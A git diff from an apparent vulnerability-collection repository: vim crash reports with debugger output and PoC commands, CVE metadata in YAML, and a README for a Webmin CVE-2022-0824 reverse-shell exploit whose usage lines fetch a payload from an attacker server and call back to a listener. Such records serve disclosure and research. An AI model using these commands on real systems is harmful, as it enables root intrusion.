+ #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+ #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+ #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+ #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+ #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+ #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+ #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+ #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+ #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+ #22 
0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 + #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 + #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 + +SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset +==1962298==ABORTING +``` +[poc_nsp01_s.dat](poc_nsp01_s.dat) +## GDB +```bash +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! + +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 +1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e + 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi + 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> + 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx + 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) +!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax + 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx + 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax + 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax + 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax +─── Breakpoints 
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time +─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 + r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 + rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1463 bd->endspaces = 0; + 1464 if ((pnew = 
alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) + 1465 == NULL) + 1466 return FAIL; + 1467 y_current->y_array[y_idx] = pnew; +!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); + 1469 pnew += bd->startspaces; + 1470 mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); + 1471 pnew += bd->textlen; + 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 +[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 +[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 +[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 +[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 +[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 +[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 +[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 +[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 +loc pnew = 0x602000007250 "\276\276": 190 '\276' 
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+>>> p bd->startspaces
+$2 = -1
+>>>
+```
+## Impact
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-1264/README.md b/cve/vim/2023/CVE-2023-1264/README.md
index df7b85a600b9cf159059f586e4b04f6b011a86c2..418a98735d54110712db1802193eddf4d986ab55 100644
--- a/cve/vim/2023/CVE-2023-1264/README.md
+++ b/cve/vim/2023/CVE-2023-1264/README.md
@@ -1,108 +1,108 @@ -# CVE-2023-1264 - -NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input. - -## vim version - -``` -commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD) -Author: Yegappan Lakshmanan -Date: Thu Feb 9 12:23:17 2023 +0000 - - patch 9.0.1293: the set_num_option() is too long - - Problem: The set_num_option() is too long. - Solution: Move code to separate functions. (Yegappan Lakshmanan, - closes #11954) -``` - -## Proof of Concept - -``` -➜ src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! -[1] 29650 segmentation fault ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! -``` - -## Debug info - -``` -pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! -Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Program received signal SIGSEGV, Segmentation fault. 
-0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145 -2145 int b0 = *p; -LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA -──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────────────────────────── - RAX 0x0 -*RBX 0x55555595ad70 ◂— 0x5 - RCX 0x0 - RDX 0x0 - RDI 0x0 -*RSI 0x1 -*R8 0x20f5d46a556c2 -*R9 0x7fffffffb314 ◂— 0x5587847b00007fff -*R10 0x7fffffffb340 ◂— 0x63e4e959 - R11 0x0 -*R12 0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim' -*R13 0x5555558878e6 (main) ◂— endbr64 -*R14 0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64 -*R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f -*RBP 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -*RSP 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... 
-*RIP 0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax] -───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────────────────────────────── - ► 0x555555699519 movzx eax, byte ptr [rax] - 0x55555569951c movzx eax, al - 0x55555569951f mov dword ptr [rbp - 4], eax - 0x555555699522 cmp dword ptr [rbp - 4], 0 - 0x555555699526 jne utfc_ptr2len+45 - ↓ - 0x555555699532 cmp dword ptr [rbp - 4], 0x7f - 0x555555699536 jg utfc_ptr2len+76 - ↓ - 0x555555699551 mov rax, qword ptr [rbp - 0x18] - 0x555555699555 mov rdi, rax - 0x555555699558 call utf_ptr2len - - 0x55555569955d mov dword ptr [rbp - 0xc], eax -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────── -In file: /root/test/vim/src/mbyte.c - 2140 */ - 2141 int - 2142 utfc_ptr2len(char_u *p) - 2143 { - 2144 int len; - ► 2145 int b0 = *p; - 2146 #ifdef FEAT_ARABIC - 2147 int prevlen; - 2148 #endif - 2149 - 2150 if (b0 == NUL) -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... -01:0008│ 0x7fffffffb458 ◂— 0x0 -02:0010│ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -03:0018│ 0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4] -04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... 
-05:0028│ 0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax -06:0030│ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ... -07:0038│ 0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752 -───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - ► f 0 0x555555699519 utfc_ptr2len+20 - f 1 0x555555638d0c unputcmdline+101 - f 2 0x55555565e74b vgetorpeek+3187 - f 3 0x55555565b8a6 vgetc+250 - f 4 0x55555565bf9e safe_vgetc+17 - f 5 0x5555556aec0f get_number+126 - f 6 0x5555556aedd7 prompt_for_number+115 - f 7 0x55555578f2b8 spell_suggest+2101 -``` - -[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat) - -## Impact - +# CVE-2023-1264 + +NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input. + +## vim version + +``` +commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD) +Author: Yegappan Lakshmanan +Date: Thu Feb 9 12:23:17 2023 +0000 + + patch 9.0.1293: the set_num_option() is too long + + Problem: The set_num_option() is too long. + Solution: Move code to separate functions. (Yegappan Lakshmanan, + closes #11954) +``` + +## Proof of Concept + +``` +➜ src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! +[1] 29650 segmentation fault ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! +``` + +## Debug info + +``` +pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! +Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
+ +Program received signal SIGSEGV, Segmentation fault. +0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145 +2145 int b0 = *p; +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────────────────────────── + RAX 0x0 +*RBX 0x55555595ad70 ◂— 0x5 + RCX 0x0 + RDX 0x0 + RDI 0x0 +*RSI 0x1 +*R8 0x20f5d46a556c2 +*R9 0x7fffffffb314 ◂— 0x5587847b00007fff +*R10 0x7fffffffb340 ◂— 0x63e4e959 + R11 0x0 +*R12 0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim' +*R13 0x5555558878e6 (main) ◂— endbr64 +*R14 0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64 +*R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f +*RBP 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +*RSP 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... 
+*RIP 0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax] +───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────────────────────────────── + ► 0x555555699519 movzx eax, byte ptr [rax] + 0x55555569951c movzx eax, al + 0x55555569951f mov dword ptr [rbp - 4], eax + 0x555555699522 cmp dword ptr [rbp - 4], 0 + 0x555555699526 jne utfc_ptr2len+45 + ↓ + 0x555555699532 cmp dword ptr [rbp - 4], 0x7f + 0x555555699536 jg utfc_ptr2len+76 + ↓ + 0x555555699551 mov rax, qword ptr [rbp - 0x18] + 0x555555699555 mov rdi, rax + 0x555555699558 call utf_ptr2len + + 0x55555569955d mov dword ptr [rbp - 0xc], eax +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────── +In file: /root/test/vim/src/mbyte.c + 2140 */ + 2141 int + 2142 utfc_ptr2len(char_u *p) + 2143 { + 2144 int len; + ► 2145 int b0 = *p; + 2146 #ifdef FEAT_ARABIC + 2147 int prevlen; + 2148 #endif + 2149 + 2150 if (b0 == NUL) +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... +01:0008│ 0x7fffffffb458 ◂— 0x0 +02:0010│ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +03:0018│ 0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4] +04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... 
+05:0028│ 0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax
+06:0030│ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ...
+07:0038│ 0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ ► f 0 0x555555699519 utfc_ptr2len+20
+ f 1 0x555555638d0c unputcmdline+101
+ f 2 0x55555565e74b vgetorpeek+3187
+ f 3 0x55555565b8a6 vgetc+250
+ f 4 0x55555565bf9e safe_vgetc+17
+ f 5 0x5555556aec0f get_number+126
+ f 6 0x5555556aedd7 prompt_for_number+115
+ f 7 0x55555578f2b8 spell_suggest+2101
+```
+
+[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat)
+
+## Impact
+
 NULL Pointer Dereference in function utfc_ptr2len allows attackers to cause a denial of service (application crash) via a crafted input.
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0288.yaml b/cve/vim/2023/yaml/CVE-2023-0288.yaml
index 08329eac674febe2b7f5d153997bcd4193b0467b..92997801bcdd8636cb7c236ffeac566f5c29dedb 100644
--- a/cve/vim/2023/yaml/CVE-2023-0288.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-0288.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-0288
-source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/
-info:
- name: Vim是一款基于UNIX平台的编辑器。
- severity: high
- description: |
- GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。
- scope-of-influence:
- vim < 9.0.1182
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-0288
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-0288
- cwe-id: CWE-122
- cnvd-id: None
- kve-id: None
+id: CVE-2023-0288
+source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。
+ scope-of-influence:
+ vim < 9.0.1182
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0288
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0288
+ cwe-id: CWE-122
+ cnvd-id: None
+ kve-id: None
 tags: cve2023, 堆buffer溢出漏洞
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0512.yaml b/cve/vim/2023/yaml/CVE-2023-0512.yaml
index d0060dc5cab2f3325241ac2aa042b697a1238b01..43291f7afe214cd0559960998a3ed71ec3061e93 100644
--- a/cve/vim/2023/yaml/CVE-2023-0512.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-0512.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-0512
-source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/
-info:
- name: Vim是一款基于UNIX平台的编辑器。
- severity: high
- description: |
- vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。
- scope-of-influence:
- vim < 9.0.1247
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-0512
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-0512
- cwe-id: CWE-369
- cnvd-id: None
- kve-id: None
+id: CVE-2023-0512
+source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。
+ scope-of-influence:
+ vim < 9.0.1247
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0512
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0512
+ cwe-id: CWE-369
+ cnvd-id: None
+ kve-id: None
 tags: cve2023, 除零错误
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-1264.yaml b/cve/vim/2023/yaml/CVE-2023-1264.yaml
index 569d8a34917fa7320d97223d29b6355ff12f6a11..6669ae9cd69445482f83f9d515343be3c36b93cf 100644
--- a/cve/vim/2023/yaml/CVE-2023-1264.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-1264.yaml
@@ -1,20 +1,20 @@
-id: CVE-2023-1264
-source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/
-info:
- name: Vim是一款基于UNIX平台的编辑器。
- severity: medium
- description: |
- NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.
- scope-of-influence:
- vim < 9.0.1392
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-1264
- - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
- cvss-score: 5.5
- cve-id: CVE-2023-1264
- cwe-id: CWE-476
- cnvd-id: None
- kve-id: None
+id: CVE-2023-1264
+source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: medium
+ description: |
+ NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.
+ scope-of-influence:
+ vim < 9.0.1392
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1264
+ - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2023-1264
+ cwe-id: CWE-476
+ cnvd-id: None
+ kve-id: None
 tags: cve2023, 空指针解引用
\ No newline at end of file
diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
index 94ff4774967add68f7a8a3d35fd30f4aba41c061..594d11ac9852f71b2e4dcdef535b707cea769507 100644
--- a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
+++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
@@ -1,23 +1,23 @@
-id: CVE-2020-14882
-source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
-info:
- name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
- severity: critical
- description: |
- CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台
- scope-of-influence:
- weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
- reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-14882
- https://www.oracle.com/security-alerts/cpuoct2020.html
- http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2020-14882
- cwe-id: None
- cnvd-id: None
- kve-id: None
+id: CVE-2020-14882
+source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: critical
+ description: |
+ CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ https://nvd.nist.gov/vuln/detail/CVE-2020-14882
+ https://www.oracle.com/security-alerts/cpuoct2020.html
+ http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
+ http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
+ http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
+ classification:
+ cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-14882
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
 tags: cve2020, Weblogic
\ No newline at end of file
diff --git a/cve/webmin/2022/CVE-2022-0824/README.md b/cve/webmin/2022/CVE-2022-0824/README.md
old mode 100755
new mode 100644
index 7b23df2885b1a89a4674759cfa93c132921826a5..9b20e2be0d8bec751c4036e028127fed5bb68604
--- a/cve/webmin/2022/CVE-2022-0824/README.md
+++ b/cve/webmin/2022/CVE-2022-0824/README.md
@@ -1,58 +1,58 @@ -# Webmin-CVE-2022-0824-revshell - - -## Vulnerability Description - -Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) -Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. -_Source: https://www.webmin.com/security.html_ - -## Exploit Description - -This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges. 
- -_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_ - -## Usage - - $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT] - $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444 - - $~ python3 Webmin-revshell.py -h - usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V] - - Webmin CVE-2022-0824 Reverse Shell - - optional arguments: - -h, --help show this help message and exit - -t TARGET, --target TARGET - Target full URL, https://www.webmin.local:10000 - -c CREDENTIAL, --credential CREDENTIAL - Format, user:user123 - -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER - Http server for serving payload, ex 192.168.5.120:8080 - -L CALLBACK_IP, --callback_ip CALLBACK_IP - Callback IP to receive revshell - -P CALLBACK_PORT, --callback_port CALLBACK_PORT - Callback port to receive revshell - -V, --version show program's version number and exit - -## PoC - - target host: https://192.168.5.118:10000 - attacker host: 192.168.5.120 - - -https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4 - - -## Tested on - - - Webmin 1.984 - - Ubuntu 18.04 - - Kali 2021.3 - - -## Disclaimer: - - The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities +# Webmin-CVE-2022-0824-revshell + + +## Vulnerability Description + +Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) +Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. 
